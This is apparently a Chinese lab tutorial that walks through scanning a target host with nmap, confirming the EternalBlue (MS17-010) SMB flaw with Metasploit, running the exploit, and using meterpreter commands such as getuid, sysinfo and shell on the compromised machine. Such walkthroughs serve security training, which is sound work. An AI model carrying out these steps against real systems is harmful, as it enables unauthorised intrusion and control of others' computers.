2.攻击机:Kali 2023 64位
ip:192.168.137.130
利用nmap扫描
nmap -v 192.168.137.131
可以看到靶机445端口是打开的,可能存在永恒之蓝漏洞
使用msf的模块进行漏洞扫描,以下是详细操作步骤
打开msf工具后搜索对应漏洞
使用模块3进行漏扫
options//查看设置
设置靶机ip
set rhosts 192.168.137.131//将需要进行漏洞扫描的计算机ip设置为rhosts
执行扫描
结果发现非常有可能存在漏洞,接下来需要切换至攻击模块进行攻击
回到msf终端,再次搜索永恒之蓝漏洞,然后使用攻击模块
输入靶机ip到rhosts中
直接执行攻击
由于之前已经执行过一次了,所以这里应该是继续执行上一次建立的会话
进入metepreter终端,攻击成功后一些简单的利用
贴一些常用的meterpreter终端命令
help 查看帮助信息
ls 查看目录下有那些东西
pwd 查看当前目录
cd 切换目录
getuid 查看当前用户权限
sysinfo 查看目标操作系统的信息
execute -f "calc.exe"
shell 进入目标系统的 终端
background 将当前的会话放到后台
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.